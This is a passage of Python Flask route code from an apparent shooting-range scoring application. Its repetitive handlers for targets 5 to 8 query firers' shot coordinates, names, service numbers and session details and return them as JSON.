fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/prediction_target_5/', methods=['GET', 'POST'])
def prediction_target_5():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_5()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 ,T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_2_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 , T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_3_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
set_3_x_arr.append(int(x_3.final_x))
for y_3 in set_3_y:
set_3_y_arr.append(int(y_3.final_y))
set_4_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 , T_Firer_Details.set_no==4 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_4_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==5 , T_Firer_Details.set_no==4 ,T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_4 in set_4_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==5,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/prediction_target_6/', methods=['GET', 'POST'])
def prediction_target_6():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_6()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 ,T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_2_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 , T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_3_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
set_3_x_arr.append(int(x_3.final_x))
for y_3 in set_3_y:
set_3_y_arr.append(int(y_3.final_y))
set_4_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 , T_Firer_Details.set_no==4 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_4_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==6 , T_Firer_Details.set_no==4 ,T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_4 in set_4_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==6,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/prediction_target_7/', methods=['GET', 'POST'])
def prediction_target_7():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_7()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7,T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_2_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7 , T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_3_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
set_3_x_arr.append(int(x_3.final_x))
for y_3 in set_3_y:
set_3_y_arr.append(int(y_3.final_y))
set_4_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7 , T_Firer_Details.set_no==4 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_4_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==7 , T_Firer_Details.set_no==4 ,T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_4 in set_4_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==7,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/prediction_target_8/', methods=['GET', 'POST'])
def prediction_target_8():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_8()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8,T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_2_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8 , T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_3_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==8 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
